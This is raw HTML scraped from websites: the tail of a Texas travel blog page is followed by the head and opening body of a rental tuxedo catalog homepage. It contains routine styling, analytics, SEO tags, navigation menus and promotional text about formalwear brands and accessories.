h3.et_pb_module_header a,.et_pb_blurb_5.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_5.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_5.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_5.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:left}.et_pb_blurb_5.et_pb_blurb{font-size:20px}.et_pb_blurb_5 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_6.et_pb_blurb h4,.et_pb_blurb_6.et_pb_blurb h4 a,.et_pb_blurb_6.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_6.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_6.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_6.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_6.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_6.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_6.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_6.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_6.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_6.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:left}.et_pb_blurb_6.et_pb_blurb{font-size:20px}.et_pb_blurb_6 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_7.et_pb_blurb{font-size:20px}.et_pb_blurb_3 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_7 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_text_2.et_pb_text{color:#100a75!important}.et_pb_text_2{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:20px}.et_pb_text_2 h1{font-size:48px}.et_pb_image_0{margin-left:0}.et_pb_image_1{margin-left:0}.et_pb_image_2{margin-left:0}.et_pb_image_3{margin-left:0}.et_pb_text_3{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:31px;text-shadow:0em 0.1em 0.1em rgba(0,0,0,0.4)}.et_pb_blurb_4.et_pb_blurb h4,.et_pb_blurb_4.et_pb_blurb h4 a,.et_pb_blurb_4.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_4.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_4.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_4.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_4.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_4.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_4.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_4.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_4.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_4.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:left}.et_pb_blurb_3.et_pb_blurb{font-size:20px}.et_pb_fullwidth_header_0.et_pb_fullwidth_header .et_pb_header_content_wrapper{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:16px;text-align:center}.et_pb_text_1{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:20px}.et_pb_fullwidth_header_0.et_pb_fullwidth_header .et_pb_fullwidth_header_subhead{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:22px;line-height:2em;text-align:center}.et_pb_fullwidth_header.et_pb_fullwidth_header_0{background-color:#6da7d9}.et_pb_fullwidth_header_0{padding-top:10px}.et_pb_fullwidth_header_0.et_pb_fullwidth_header .et_pb_fullwidth_header_overlay{background-color:rgba(31,120,193,0)}.et_pb_section_1:before{display:block;position:absolute;content:'';bottom:20px;width:14px;height:14px;border-radius:50%;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);background:#fff;box-shadow:30px 0 #100a75,-30px 0 #100a75}.et_pb_text_0.et_pb_text{color:#100a75!important}.et_pb_text_0{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:40px;text-shadow:0em 0.1em 0.1em rgba(0,0,0,0.4);padding-top:157px!important}.et_pb_text_1.et_pb_text{color:#100a75!important}.et_pb_text_1 h1{font-size:48px}.et_pb_blurb_3.et_pb_blurb h4,.et_pb_blurb_3.et_pb_blurb h4 a,.et_pb_blurb_3.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_3.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_3.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:center}.et_pb_blurb_0.et_pb_blurb h4,.et_pb_blurb_0.et_pb_blurb h4 a,.et_pb_blurb_0.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_0.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_0.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:center}.et_pb_blurb_0.et_pb_blurb{font-size:20px}.et_pb_blurb_0 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_1.et_pb_blurb h4,.et_pb_blurb_1.et_pb_blurb h4 a,.et_pb_blurb_1.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_1.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_1.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:left}.et_pb_blurb_1.et_pb_blurb{font-size:20px}.et_pb_blurb_1 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_blurb_2.et_pb_blurb h4,.et_pb_blurb_2.et_pb_blurb h4 a,.et_pb_blurb_2.et_pb_blurb h1.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h1.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h2.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h2.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h3.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h3.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h5.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h5.et_pb_module_header a,.et_pb_blurb_2.et_pb_blurb h6.et_pb_module_header,.et_pb_blurb_2.et_pb_blurb h6.et_pb_module_header a{text-transform:none;font-size:17px;text-align:center}.et_pb_blurb_2.et_pb_blurb{font-size:20px}.et_pb_blurb_2 .et-pb-icon{font-size:22px;color:#100a75}.et_pb_text_4{font-family:'Arimo',Helvetica,Arial,Lucida,sans-serif;font-size:31px;text-shadow:0em 0.1em 0.1em rgba(0,0,0,0.4)}</style> <script type="application/ld+json">{ "@context": "http://schema.org/", "@type": "WebSite", "url": "https://twotravelingtexans.com", "name": null, "alternateName": null }</script> <script type='text/javascript' src='https://stats.wp.com/e-201920.js' async='async' defer='defer'></script> <script type='text/javascript'>_stq = window._stq || []; _stq.push([ 'view', {v:'ext',j:'1:7.3.1',blog:'97594457',post:'8232',tz:'-4',srv:'twotravelingtexans.com'} ]); _stq.push([ 'clickTrackerInit', '97594457', '8232' ]);</script> <div id="cookie-notice" role="banner" class="cn-top bootstrap" style="color: #fff; background-color: #000;"><div class="cookie-notice-container"><span id="cn-notice-text">We use cookies to ensure that we give you the best experience on our website. If you continue to use this site we will assume that you are happy with it.</span><a href="#" id="cn-accept-cookie" data-cookie-set="accept" class="cn-set-cookie cn-button bootstrap button">Ok</a><a href="https://twotravelingtexans.com/about-us/disclaimer-privacy-policy/" target="_blank" id="cn-more-info" class="cn-more-info cn-button bootstrap button">Read more</a></div></div></body></html>
0
<!doctype html> <!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"> <![endif]--> <!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8" lang="en"> <![endif]--> <!--[if IE 8]> <html class="no-js lt-ie9" lang="en"> <![endif]--> <!--[if gt IE 8]><!--> <html class="no-js" lang="en"> <!--<![endif]--> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="initial-scale=1, width=device-width" /> <title>Online Tuxedo Catalog | MyTuxedoCatalog.com</title> <meta name="author" content="Z-Axis Creative"> <link rel="author" href="http://www.zaxiscreative.com" /> <!-- Touch icon for iOS 2.0+ and Android 2.1+ --> <link rel="apple-touch-icon-precomposed" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-152.png"> <!-- IE 10 Metro tile icon --> <meta name="msapplication-TileImage" content="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-144.png"> <!-- For iPad with high-resolution Retina display running iOS ≥ 7: --> <link rel="apple-touch-icon-precomposed" sizes="152x152" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-152.png"> <!-- For iPad with high-resolution Retina display running iOS ≤ 6: --> <link rel="apple-touch-icon-precomposed" sizes="144x144" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-144.png"> <!-- For iPhone with high-resolution Retina display running iOS ≥ 7: --> <link rel="apple-touch-icon-precomposed" sizes="120x120" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-120.png"> <!-- For iPhone with high-resolution Retina display running iOS ≤ 6: --> <link rel="apple-touch-icon-precomposed" sizes="114x114" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-114.png"> <!-- For first- and second-generation iPad: --> <link rel="apple-touch-icon-precomposed" sizes="72x72" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-72.png"> <!-- For non-Retina iPhone, iPod Touch, and Android 2.1+ devices: --> <link rel="apple-touch-icon-precomposed" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-57.png"> <!-- For non-Retina iPhone, iPod Touch, and Android 2.1+ devices: --> <link rel="icon" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon-32.png" sizes="32x32"> <!--<link rel="shortcut icon" type="image/x-icon" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon.png" />--> <!--<link rel="icon" href="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/favicon.ico" type="image/x-icon">--> <script src="//use.typekit.net/ijt2vre.js"></script> <script>try{Typekit.load();}catch(e){}</script> <!-- This site is optimized with the Yoast SEO plugin v7.6 - https://yoast.com/wordpress/plugins/seo/ --> <meta name="description" content="MyTuxedoCatalog.com is the premier online source of rental formalwear tuxedo styles and information for retailers and consumers across America."/> <link rel="canonical" href="https://www.mytuxedocatalog.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Online Tuxedo Catalog | MyTuxedoCatalog.com" /> <meta property="og:description" content="MyTuxedoCatalog.com is the premier online source of rental formalwear tuxedo styles and information for retailers and consumers across America." /> <meta property="og:url" content="https://www.mytuxedocatalog.com/" /> <meta property="og:site_name" content="MyTuxedoCatalog.com" /> <meta property="og:image" content="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/login-logo.png" /> <meta property="og:image:secure_url" content="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/login-logo.png" /> <meta name="twitter:card" content="summary_large_image" /> <meta name="twitter:description" content="MyTuxedoCatalog.com is the premier online source of rental formalwear tuxedo styles and information for retailers and consumers across America." /> <meta name="twitter:title" content="Online Tuxedo Catalog | MyTuxedoCatalog.com" /> <meta name="twitter:site" content="@paulmorrelltuxs" /> <meta name="twitter:image" content="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/login-logo.png" /> <meta name="twitter:creator" content="@paulmorrelltuxs" /> <script type='application/ld+json'>{"@context":"https:\/\/schema.org","@type":"WebSite","@id":"#website","url":"https:\/\/www.mytuxedocatalog.com\/","name":"MyTuxedoCatalog.com","potentialAction":{"@type":"SearchAction","target":"https:\/\/www.mytuxedocatalog.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <!-- / Yoast SEO plugin. --> <link rel='dns-prefetch' href='//ajax.googleapis.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.mytuxedocatalog.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.10"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='theme-style-css' href='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/css/mtc.css?ver=1.2' type='text/css' media='screen' /> <script type='text/javascript'> /* <![CDATA[ */ var IwNRCargs = {"rightclick":"Y","draganddrop":"Y"}; /* ]]> */ </script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/plugins/image-watermark/js/no-right-click.js?ver=1.6.1'></script> <script type='text/javascript' src='//ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js?ver=2.1.3'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/libs/modernizr-2.5.3.min.js?ver=2.5.3'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/libs/mediaCheck-min.js?ver=0.4.5'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/libs/jquery.magnific-popup.min.js?ver=1.0'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/libs/jquery.cookie.js?ver=1.0'></script> <script type='text/javascript' src='https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/js/libs/slick/slick.min.js?ver=1.3.14'></script> <link rel='https://api.w.org/' href='https://www.mytuxedocatalog.com/wp-json/' /> <link rel='shortlink' href='https://www.mytuxedocatalog.com/' /> <link rel="alternate" type="application/json+oembed" href="https://www.mytuxedocatalog.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.mytuxedocatalog.com%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.mytuxedocatalog.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.mytuxedocatalog.com%2F&#038;format=xml" /> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-5804175-3', 'auto'); ga('require', 'displayfeatures'); ga('send', 'pageview'); </script> </head> <body class="home page-template page-template-page-templates page-template-home-page page-template-page-templateshome-page-php page page-id-15736 mobile"> <!--[if lt IE 9]> <div style="text-align: center; clear: both; height: 80px; z-index:100000; position: relative; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') repeat-x 0px 0px;"> <div style="width:960px; height: 80px; margin:0px auto; position:relative;"> <a href="#" onclick="javascript:this.parentNode.parentNode.style.display='none'; return false;" style="display:block; position: absolute; right: 3px; top: 3px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat -500px -200px; width:18px; height:18px;"></a> <div style="position:absolute; left:0px; top:10px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat 0px -200px; width:100px; height:100px;"></div> <div style="position:absolute; left:60px; top:20px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat 0px -100px; width:800px; height:50px;"></div> <a href="http://windows.microsoft.com/en-US/internet-explorer/downloads/ie" target="_blank" style="position:absolute; right:40px; top:7px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat -400px -200px; width:50px; height:80px;"></a> <a href="http://www.apple.com/safari/" target="_blank" style="position:absolute; right:100px; top:7px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat -300px -200px; width:50px; height:80px;"></a> <a href="http://www.getfirefox.com" target="_blank" style="position:absolute; right:160px; top:7px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat -200px -200px; width:50px; height:80px;"></a> <a href="http://www.google.com/chrome" target="_blank" style="position:absolute; right:220px; top:7px; background:url('https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/alertBanner-sprite.png') no-repeat -100px -200px; width:50px; height:80px;"></a> </div> </div> <![endif]--> <div class="site-wrapper"> <div id="search-overlay"></div> <div id="loading-overlay"></div> <nav class="offcanvas-menu"> <a class="locate hideMe" href="https://www.mytuxedocatalog.com/locate/"><i class="icon icon-map-pin"></i>Find a Local Rental Shop<i class="icon icon-right-arrow"></i></a> <ul id="offcanvas-nav" class="menu"><li id="menu-item-15726" class="left menu-item menu-item-type-custom menu-item-object-custom menu-item-15726"><a href="/catalog/rental-tuxedos-and-suits/">Tuxedos &#038; Suits</a></li> <li id="menu-item-15727" class="left menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-15727"><a href="/catalog/">Accessories</a> <ul class="sub-menu"> <li id="menu-item-15738" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15738"><a href="/catalog/pants/">Pants</a></li> <li id="menu-item-15739" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15739"><a href="/catalog/shirts/">Shirts</a></li> <li id="menu-item-15740" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15740"><a href="/catalog/vests/">Vests</a></li> <li id="menu-item-15741" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15741"><a href="/catalog/cummerbunds/">Cummerbunds</a></li> <li id="menu-item-15742" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15742"><a href="/catalog/ties/">Ties</a></li> <li id="menu-item-15743" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15743"><a href="/catalog/suspenders/">Suspenders</a></li> <li id="menu-item-15744" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15744"><a href="/catalog/shoes">Shoes</a></li> <li id="menu-item-15745" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15745"><a href="/catalog/pocket-squares/">Pocket Squares</a></li> <li id="menu-item-15746" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15746"><a href="/catalog/formal-jewelry/">Jewelry</a></li> <li id="menu-item-15747" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15747"><a href="/catalog/hats/">Hats</a></li> <li id="menu-item-15748" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15748"><a href="/catalog/canes/">Canes</a></li> <li id="menu-item-15749" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15749"><a href="/catalog/gloves/">Gloves</a></li> <li id="menu-item-15750" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15750"><a href="/catalog/socks/">Socks</a></li> </ul> </li> <li id="menu-item-15728" class="left hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15728"><a href="https://www.mytuxedocatalog.com/locate/">Locations</a></li> <li id="menu-item-15729" class="right menu-item menu-item-type-post_type menu-item-object-page menu-item-15729"><a href="https://www.mytuxedocatalog.com/blog/">Blog</a></li> <li id="menu-item-15730" class="right hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15730"><a href="https://www.mytuxedocatalog.com/contact/">Contact</a></li> <li id="menu-item-15731" class="right hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15731"><a href="https://www.mytuxedocatalog.com/about/">About MTC</a></li> </ul> <a class="offcanvas-home" href="https://www.mytuxedocatalog.com"></a> </nav> <div class="offcanvas-wrapper"> <div class="header"> <header class="row"> <div class="small-12 columns"> <a href="https://www.mytuxedocatalog.com" class="header-logo" title="MyTuxedoCatalog.com"></a> <form role="search" method="get" id="search-form" class="searchform" action="/search-results/"> <div class="input-container"> <input type="text" value="" placeholder="Search" name="query" id="s" /> <button type="submit" id="search-submit"><i class="icon icon-search"></i></button> </div> </form> <a id="mobile-toggle-menu" href="#"></a> </div> <div class="small-12 columns"> <nav class="header-nav-bar"> <ul id="header-primary-nav" class="menu"><li class="left menu-item menu-item-type-custom menu-item-object-custom menu-item-15726"><a href="/catalog/rental-tuxedos-and-suits/">Tuxedos &#038; Suits</a></li> <li class="left menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-15727"><a href="/catalog/">Accessories</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15738"><a href="/catalog/pants/">Pants</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15739"><a href="/catalog/shirts/">Shirts</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15740"><a href="/catalog/vests/">Vests</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15741"><a href="/catalog/cummerbunds/">Cummerbunds</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15742"><a href="/catalog/ties/">Ties</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15743"><a href="/catalog/suspenders/">Suspenders</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15744"><a href="/catalog/shoes">Shoes</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15745"><a href="/catalog/pocket-squares/">Pocket Squares</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15746"><a href="/catalog/formal-jewelry/">Jewelry</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15747"><a href="/catalog/hats/">Hats</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15748"><a href="/catalog/canes/">Canes</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15749"><a href="/catalog/gloves/">Gloves</a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-15750"><a href="/catalog/socks/">Socks</a></li> </ul> </li> <li class="left hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15728"><a href="https://www.mytuxedocatalog.com/locate/">Locations</a></li> <li class="right menu-item menu-item-type-post_type menu-item-object-page menu-item-15729"><a href="https://www.mytuxedocatalog.com/blog/">Blog</a></li> <li class="right hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15730"><a href="https://www.mytuxedocatalog.com/contact/">Contact</a></li> <li class="right hideMe menu-item menu-item-type-post_type menu-item-object-page menu-item-15731"><a href="https://www.mytuxedocatalog.com/about/">About MTC</a></li> </ul> </nav> </div> </header> </div> <section id="home-slides"> <div class="slide" style="background-image:url(https://www.mytuxedocatalog.com/wp-content/uploads/2018/09/Kenneth-Cole-Alt-kraked.jpg);"></div><a class="slide" href="https://www.mytuxedocatalog.com/blog/" target="_blank" style="background-image:url(https://www.mytuxedocatalog.com/wp-content/uploads/2018/09/Top-10-MTC-Banner-kraked.jpg);"></a><a class="slide" href="https://www.mytuxedocatalog.com/catalog/rental-tuxedos-and-suits/" target="_self" style="background-image:url(https://www.mytuxedocatalog.com/wp-content/uploads/2018/03/2018-MTC-Prom-Banner-kraked.png);"></a><a class="slide" href="https://www.mytuxedocatalog.com/catalog/rental-tuxedos-and-suits/#label=ike-behar-evening" target="_self" style="background-image:url(https://www.mytuxedocatalog.com/wp-content/uploads/2017/07/Blake-Marbella-MTC-Banner_kraked.jpg);"></a> </section> <section id="home-tagline"> <div class="row"> <h2 class="home-heading">The <strong>Premier Resource</strong> for Men's Rental Formal Wear</h2> </div> </section> <section id="home-infographic"> <div class="row"> <ul> <li class="browse"> <a href="/catalog/rental-tuxedos-and-suits/" title="Browse Tuxedos & Suits"> <span class="infographic-icon"></span> <h3>Browse<span>our extensive rental catalog</span></h3> <p>Our warehouse contains the largest selection of rental formal wear items in America. Browse by color, style, manufacturer, and more!</p> </a> </li> <li class="visit"> <a href="/locate/" title="Find a local retail store nearby"> <span class="infographic-icon"></span> <h3>Visit<span>a local rental shop near you</span></h3> <p>Whether you're in L.A., Little Rock, or your home town, our network of partner rental stores are always nearby!</p> </a> </li> <li class="impress"> <a href="/blog/category/formal-style/awards-season/" title="Latest Trends from the Red Carpet"> <span class="infographic-icon"></span> <h3>Impress<span>at your next event</span></h3> <p>Show up in style, knowing you're sporting the hottest fashion styles in formal wear.</p> </a> </li> </ul> </div><!-- .row --> </section> <section id="home-labels"> <div class="label first"> <a href="/catalog/rental-tuxedos-and-suits/#label=jean-yves"> <div> <span><img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/home-label-jean-yves.png" class="logo" /></span> </div> </a> </div> <div class="label second"> <a href="/catalog/rental-tuxedos-and-suits/#label=michael-kors"> <div> <span><img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/home-label-kors.png" class="logo" /></span> </div> </a> </div> <div class="label third"> <a href="/catalog/rental-tuxedos-and-suits/#label=david-tutera"> <div> <span><img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/home-label-tutera.png" class="logo" /></span> </div> </a> </div> <div class="label fourth"> <a href="/catalog/rental-tuxedos-and-suits/#label=ike-behar-evening"> <div> <span><img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/home-label-ike-behar.png" class="logo" /></span> </div> </a> </div> <div class="label fifth"> <a href="/catalog/rental-tuxedos-and-suits/#label=allure-men"> <div> <span><img src="https://www.mytuxedocatalog.com/wp-content/themes/MTCv2/img/home-label-allure.png" class="logo" /></span> </div> </a> </div> </section> <section id="home-content"> <div class="row"> <div class="context-content"> <h2 class="home-heading">America's premier <strong>formal wear Resource</strong></h2> <p>MyTuxedoCatalog.com is the premier online source of rental tuxedo styles for retailers and consumers across America. We maintain a huge selection of nearly 100 styles of rental Tuxedos &amp; Suits that are perfect for any formal event, from wedding tuxedos and prom tuxedos to formalwear for any occasion. Browse our online tuxedo catalog, Locate an Authorized Dealer, or contact us today to learn about how your business can become a wholesale tuxedo rental account.</p> </div> <a href="https://cdn.flipsnack.com/widget/v2/widget.html?hash=ftiyd59t4&bgcolor=000000&t=1552481903" class="home-catalog lightbox iframe">View Our Print Catalog</a> </div> </section> <section id="home-posts"> <div class="row"> <h2 class="home-heading">From the <strong>Blog</strong></h2> </div> <div class="row"> <div class="small-12 columns" id="post-loop"> <ul class="small-block-grid-1 medium-block-grid-3"> <li 